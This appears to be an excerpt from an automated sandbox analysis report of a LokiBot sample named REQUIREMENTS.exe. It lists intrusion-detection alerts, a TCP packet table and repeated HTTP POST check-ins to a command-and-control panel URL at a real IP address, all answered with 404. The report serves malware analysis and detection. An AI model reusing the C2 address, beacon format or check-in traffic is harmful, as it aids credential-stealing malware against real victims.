                12/03/20-10:00:19.800045TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011380192.168.2.545.134.225.18
                12/03/20-10:00:19.800045TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011380192.168.2.545.134.225.18
                12/03/20-10:00:19.800045TCP2025381ET TROJAN LokiBot Checkin5011380192.168.2.545.134.225.18
                12/03/20-10:00:19.800045TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011380192.168.2.545.134.225.18
                12/03/20-10:00:20.078300TCP2570WEB-MISC Invalid HTTP Version String5011480192.168.2.545.134.225.18
                12/03/20-10:00:20.078300TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011480192.168.2.545.134.225.18
                12/03/20-10:00:20.078300TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011480192.168.2.545.134.225.18
                12/03/20-10:00:20.078300TCP2025381ET TROJAN LokiBot Checkin5011480192.168.2.545.134.225.18
                12/03/20-10:00:20.078300TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011480192.168.2.545.134.225.18
                12/03/20-10:00:20.584214TCP2570WEB-MISC Invalid HTTP Version String5011580192.168.2.545.134.225.18
                12/03/20-10:00:20.584214TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011580192.168.2.545.134.225.18
                12/03/20-10:00:20.584214TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011580192.168.2.545.134.225.18
                12/03/20-10:00:20.584214TCP2025381ET TROJAN LokiBot Checkin5011580192.168.2.545.134.225.18
                12/03/20-10:00:20.584214TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011580192.168.2.545.134.225.18
                12/03/20-10:00:20.876080TCP2570WEB-MISC Invalid HTTP Version String5011680192.168.2.545.134.225.18
                12/03/20-10:00:20.876080TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011680192.168.2.545.134.225.18
                12/03/20-10:00:20.876080TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011680192.168.2.545.134.225.18
                12/03/20-10:00:20.876080TCP2025381ET TROJAN LokiBot Checkin5011680192.168.2.545.134.225.18
                12/03/20-10:00:20.876080TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011680192.168.2.545.134.225.18
                12/03/20-10:00:21.154033TCP2570WEB-MISC Invalid HTTP Version String5011780192.168.2.545.134.225.18
                12/03/20-10:00:21.154033TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011780192.168.2.545.134.225.18
                12/03/20-10:00:21.154033TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011780192.168.2.545.134.225.18
                12/03/20-10:00:21.154033TCP2025381ET TROJAN LokiBot Checkin5011780192.168.2.545.134.225.18
                12/03/20-10:00:21.154033TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011780192.168.2.545.134.225.18
                12/03/20-10:00:21.432660TCP2570WEB-MISC Invalid HTTP Version String5011880192.168.2.545.134.225.18
                12/03/20-10:00:21.432660TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011880192.168.2.545.134.225.18
                12/03/20-10:00:21.432660TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011880192.168.2.545.134.225.18
                12/03/20-10:00:21.432660TCP2025381ET TROJAN LokiBot Checkin5011880192.168.2.545.134.225.18
                12/03/20-10:00:21.432660TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011880192.168.2.545.134.225.18
                12/03/20-10:00:22.083736TCP2570WEB-MISC Invalid HTTP Version String5011980192.168.2.545.134.225.18
                12/03/20-10:00:22.083736TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011980192.168.2.545.134.225.18
                12/03/20-10:00:22.083736TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011980192.168.2.545.134.225.18
                12/03/20-10:00:22.083736TCP2025381ET TROJAN LokiBot Checkin5011980192.168.2.545.134.225.18
                12/03/20-10:00:22.083736TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011980192.168.2.545.134.225.18
                12/03/20-10:00:22.348216TCP2570WEB-MISC Invalid HTTP Version String5012080192.168.2.545.134.225.18
                12/03/20-10:00:22.348216TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012080192.168.2.545.134.225.18
                12/03/20-10:00:22.348216TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012080192.168.2.545.134.225.18
                12/03/20-10:00:22.348216TCP2025381ET TROJAN LokiBot Checkin5012080192.168.2.545.134.225.18
                12/03/20-10:00:22.348216TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012080192.168.2.545.134.225.18
                12/03/20-10:00:23.297598TCP2570WEB-MISC Invalid HTTP Version String5012180192.168.2.545.134.225.18
                12/03/20-10:00:23.297598TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012180192.168.2.545.134.225.18
                12/03/20-10:00:23.297598TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012180192.168.2.545.134.225.18
                12/03/20-10:00:23.297598TCP2025381ET TROJAN LokiBot Checkin5012180192.168.2.545.134.225.18
                12/03/20-10:00:23.297598TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012180192.168.2.545.134.225.18
                12/03/20-10:00:24.038285TCP2570WEB-MISC Invalid HTTP Version String5012280192.168.2.545.134.225.18
                12/03/20-10:00:24.038285TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012280192.168.2.545.134.225.18
                12/03/20-10:00:24.038285TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012280192.168.2.545.134.225.18
                12/03/20-10:00:24.038285TCP2025381ET TROJAN LokiBot Checkin5012280192.168.2.545.134.225.18
                12/03/20-10:00:24.038285TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012280192.168.2.545.134.225.18
                12/03/20-10:00:24.357159TCP2570WEB-MISC Invalid HTTP Version String5012380192.168.2.545.134.225.18
                12/03/20-10:00:24.357159TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012380192.168.2.545.134.225.18
                12/03/20-10:00:24.357159TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012380192.168.2.545.134.225.18
                12/03/20-10:00:24.357159TCP2025381ET TROJAN LokiBot Checkin5012380192.168.2.545.134.225.18
                12/03/20-10:00:24.357159TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012380192.168.2.545.134.225.18

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Dec 3, 2020 09:58:26.465631962 CET4972080192.168.2.545.134.225.18
                Dec 3, 2020 09:58:26.499711990 CET804972045.134.225.18192.168.2.5
                Dec 3, 2020 09:58:26.499820948 CET4972080192.168.2.545.134.225.18
                Dec 3, 2020 09:58:26.503770113 CET4972080192.168.2.545.134.225.18
                Dec 3, 2020 09:58:26.537940025 CET804972045.134.225.18192.168.2.5
                Dec 3, 2020 09:58:26.538024902 CET4972080192.168.2.545.134.225.18
                Dec 3, 2020 09:58:26.572215080 CET804972045.134.225.18192.168.2.5
                Dec 3, 2020 09:58:26.601042986 CET804972045.134.225.18192.168.2.5
                Dec 3, 2020 09:58:26.601079941 CET804972045.134.225.18192.168.2.5
                Dec 3, 2020 09:58:26.601445913 CET4972080192.168.2.545.134.225.18
                Dec 3, 2020 09:58:26.602505922 CET4972080192.168.2.545.134.225.18
                Dec 3, 2020 09:58:26.636691093 CET804972045.134.225.18192.168.2.5
                Dec 3, 2020 09:58:26.786995888 CET4972180192.168.2.545.134.225.18
                Dec 3, 2020 09:58:26.821343899 CET804972145.134.225.18192.168.2.5
                Dec 3, 2020 09:58:26.821486950 CET4972180192.168.2.545.134.225.18
                Dec 3, 2020 09:58:26.824676037 CET4972180192.168.2.545.134.225.18
                Dec 3, 2020 09:58:26.860539913 CET804972145.134.225.18192.168.2.5
                Dec 3, 2020 09:58:26.860704899 CET4972180192.168.2.545.134.225.18
                Dec 3, 2020 09:58:26.895162106 CET804972145.134.225.18192.168.2.5
                Dec 3, 2020 09:58:26.913990974 CET804972145.134.225.18192.168.2.5
                Dec 3, 2020 09:58:26.914053917 CET804972145.134.225.18192.168.2.5
                Dec 3, 2020 09:58:26.914107084 CET4972180192.168.2.545.134.225.18
                Dec 3, 2020 09:58:26.914165974 CET4972180192.168.2.545.134.225.18
                Dec 3, 2020 09:58:26.948302984 CET804972145.134.225.18192.168.2.5
                Dec 3, 2020 09:58:27.018290043 CET4972280192.168.2.545.134.225.18
                Dec 3, 2020 09:58:27.052527905 CET804972245.134.225.18192.168.2.5
                Dec 3, 2020 09:58:27.053313017 CET4972280192.168.2.545.134.225.18
                Dec 3, 2020 09:58:27.056194067 CET4972280192.168.2.545.134.225.18
                Dec 3, 2020 09:58:27.090291023 CET804972245.134.225.18192.168.2.5
                Dec 3, 2020 09:58:27.090384960 CET4972280192.168.2.545.134.225.18
                Dec 3, 2020 09:58:27.124411106 CET804972245.134.225.18192.168.2.5
                Dec 3, 2020 09:58:27.141437054 CET804972245.134.225.18192.168.2.5
                Dec 3, 2020 09:58:27.141469955 CET804972245.134.225.18192.168.2.5
                Dec 3, 2020 09:58:27.141549110 CET4972280192.168.2.545.134.225.18
                Dec 3, 2020 09:58:27.141625881 CET4972280192.168.2.545.134.225.18
                Dec 3, 2020 09:58:27.175672054 CET804972245.134.225.18192.168.2.5
                Dec 3, 2020 09:58:27.299004078 CET4972380192.168.2.545.134.225.18
                Dec 3, 2020 09:58:27.333136082 CET804972345.134.225.18192.168.2.5
                Dec 3, 2020 09:58:27.333240986 CET4972380192.168.2.545.134.225.18
                Dec 3, 2020 09:58:27.336148977 CET4972380192.168.2.545.134.225.18
                Dec 3, 2020 09:58:27.370770931 CET804972345.134.225.18192.168.2.5
                Dec 3, 2020 09:58:27.370852947 CET4972380192.168.2.545.134.225.18
                Dec 3, 2020 09:58:27.408350945 CET804972345.134.225.18192.168.2.5
                Dec 3, 2020 09:58:27.425896883 CET804972345.134.225.18192.168.2.5
                Dec 3, 2020 09:58:27.425926924 CET804972345.134.225.18192.168.2.5
                Dec 3, 2020 09:58:27.426306963 CET4972380192.168.2.545.134.225.18
                Dec 3, 2020 09:58:27.426428080 CET4972380192.168.2.545.134.225.18
                Dec 3, 2020 09:58:27.460521936 CET804972345.134.225.18192.168.2.5
                Dec 3, 2020 09:58:27.576335907 CET4972480192.168.2.545.134.225.18
                Dec 3, 2020 09:58:27.610673904 CET804972445.134.225.18192.168.2.5
                Dec 3, 2020 09:58:27.610797882 CET4972480192.168.2.545.134.225.18
                Dec 3, 2020 09:58:27.613622904 CET4972480192.168.2.545.134.225.18
                Dec 3, 2020 09:58:27.647777081 CET804972445.134.225.18192.168.2.5
                Dec 3, 2020 09:58:27.647898912 CET4972480192.168.2.545.134.225.18
                Dec 3, 2020 09:58:27.682130098 CET804972445.134.225.18192.168.2.5
                Dec 3, 2020 09:58:27.699301958 CET804972445.134.225.18192.168.2.5
                Dec 3, 2020 09:58:27.699331999 CET804972445.134.225.18192.168.2.5
                Dec 3, 2020 09:58:27.699426889 CET4972480192.168.2.545.134.225.18
                Dec 3, 2020 09:58:27.699556112 CET4972480192.168.2.545.134.225.18
                Dec 3, 2020 09:58:27.733630896 CET804972445.134.225.18192.168.2.5
                Dec 3, 2020 09:58:27.860171080 CET4972580192.168.2.545.134.225.18
                Dec 3, 2020 09:58:27.894840002 CET804972545.134.225.18192.168.2.5
                Dec 3, 2020 09:58:27.894946098 CET4972580192.168.2.545.134.225.18
                Dec 3, 2020 09:58:27.897850037 CET4972580192.168.2.545.134.225.18
                Dec 3, 2020 09:58:27.932214022 CET804972545.134.225.18192.168.2.5
                Dec 3, 2020 09:58:27.932322979 CET4972580192.168.2.545.134.225.18
                Dec 3, 2020 09:58:27.966700077 CET804972545.134.225.18192.168.2.5
                Dec 3, 2020 09:58:27.983211994 CET804972545.134.225.18192.168.2.5
                Dec 3, 2020 09:58:27.983268976 CET804972545.134.225.18192.168.2.5
                Dec 3, 2020 09:58:27.983335972 CET4972580192.168.2.545.134.225.18
                Dec 3, 2020 09:58:27.983402014 CET4972580192.168.2.545.134.225.18
                Dec 3, 2020 09:58:28.019524097 CET804972545.134.225.18192.168.2.5
                Dec 3, 2020 09:58:28.147185087 CET4972680192.168.2.545.134.225.18
                Dec 3, 2020 09:58:28.181319952 CET804972645.134.225.18192.168.2.5
                Dec 3, 2020 09:58:28.181533098 CET4972680192.168.2.545.134.225.18
                Dec 3, 2020 09:58:28.184462070 CET4972680192.168.2.545.134.225.18
                Dec 3, 2020 09:58:28.218713999 CET804972645.134.225.18192.168.2.5
                Dec 3, 2020 09:58:28.218837023 CET4972680192.168.2.545.134.225.18
                Dec 3, 2020 09:58:28.252978086 CET804972645.134.225.18192.168.2.5
                Dec 3, 2020 09:58:28.269916058 CET804972645.134.225.18192.168.2.5
                Dec 3, 2020 09:58:28.269947052 CET804972645.134.225.18192.168.2.5
                Dec 3, 2020 09:58:28.270281076 CET4972680192.168.2.545.134.225.18
                Dec 3, 2020 09:58:28.270322084 CET4972680192.168.2.545.134.225.18
                Dec 3, 2020 09:58:28.305207014 CET804972645.134.225.18192.168.2.5
                Dec 3, 2020 09:58:28.422228098 CET4972780192.168.2.545.134.225.18
                Dec 3, 2020 09:58:28.456798077 CET804972745.134.225.18192.168.2.5
                Dec 3, 2020 09:58:28.457048893 CET4972780192.168.2.545.134.225.18
                Dec 3, 2020 09:58:28.460179090 CET4972780192.168.2.545.134.225.18
                Dec 3, 2020 09:58:28.494518995 CET804972745.134.225.18192.168.2.5
                Dec 3, 2020 09:58:28.494596004 CET4972780192.168.2.545.134.225.18
                Dec 3, 2020 09:58:28.529102087 CET804972745.134.225.18192.168.2.5
                Dec 3, 2020 09:58:28.545113087 CET804972745.134.225.18192.168.2.5
                Dec 3, 2020 09:58:28.545135021 CET804972745.134.225.18192.168.2.5
                Dec 3, 2020 09:58:28.545222998 CET4972780192.168.2.545.134.225.18
                Dec 3, 2020 09:58:28.545319080 CET4972780192.168.2.545.134.225.18
                Dec 3, 2020 09:58:28.579591990 CET804972745.134.225.18192.168.2.5
                Dec 3, 2020 09:58:28.711718082 CET4972880192.168.2.545.134.225.18
                Dec 3, 2020 09:58:28.746599913 CET804972845.134.225.18192.168.2.5
                Dec 3, 2020 09:58:28.746758938 CET4972880192.168.2.545.134.225.18
                Dec 3, 2020 09:58:28.750068903 CET4972880192.168.2.545.134.225.18

                HTTP Request Dependency Graph

                • 45.134.225.18

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.54972045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:26.503770113 CET77OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 192
                Connection: close
                Dec 3, 2020 09:58:26.601042986 CET78INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:26 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                1192.168.2.54972145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:26.824676037 CET78OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 192
                Connection: close
                Dec 3, 2020 09:58:26.913990974 CET79INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:27 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                10192.168.2.54973045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:29.329893112 CET90OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:29.415095091 CET91INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:29 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                100192.168.2.54982545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                101192.168.2.54982645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                102192.168.2.54982745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                103192.168.2.54982845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                104192.168.2.54982945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                105192.168.2.54983045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                106192.168.2.54983145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                107192.168.2.54983245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                108192.168.2.54983345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                109192.168.2.54983445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                11192.168.2.54973145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:29.618994951 CET92OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:29.704355955 CET92INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:29 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                110192.168.2.54983545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                111192.168.2.54983745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                112192.168.2.54983845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                113192.168.2.54983945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                114192.168.2.54984045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                115192.168.2.54984145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                116192.168.2.54984245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                117192.168.2.54984345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                118192.168.2.54984445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                119192.168.2.54984545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                12192.168.2.54973245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:29.938024044 CET93OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:30.022994995 CET93INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:30 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                120192.168.2.54984745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                121192.168.2.54984845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                122192.168.2.54984945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                123192.168.2.54985045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                124192.168.2.54985145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                125192.168.2.54985245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                126192.168.2.54985345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                127192.168.2.54985645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                128192.168.2.54985745.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                129192.168.2.54985845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                13192.168.2.54973445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:30.229907990 CET94OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:30.314393997 CET95INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:30 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                130192.168.2.54985945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                131192.168.2.54986045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                132192.168.2.54986145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                133192.168.2.54986245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                134192.168.2.54986345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                135192.168.2.54986445.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                136192.168.2.54986545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                137192.168.2.54986645.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                138192.168.2.54986845.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                139192.168.2.54986945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                14192.168.2.54973545.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData
                Dec 3, 2020 09:58:30.508996964 CET96OUTPOST /plesk-site-preview/endustrigm.eu/http/45.134.225.18/tmoni/Panel/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.134.225.18
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: FB126016
                Content-Length: 165
                Connection: close
                Dec 3, 2020 09:58:30.594472885 CET96INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Thu, 03 Dec 2020 08:57:30 GMT
                Content-Type: text/html; charset=UTF-8
                Connection: close
                X-Powered-By: PHP/5.6.40
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                140192.168.2.54987045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                141192.168.2.54987145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                142192.168.2.54987245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                143192.168.2.54987345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                144192.168.2.54987945.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                145192.168.2.54988045.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                146192.168.2.54988145.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                147192.168.2.54988245.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                148192.168.2.54988345.134.225.1880C:\Users\user\Desktop\REQUIREMENTS.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
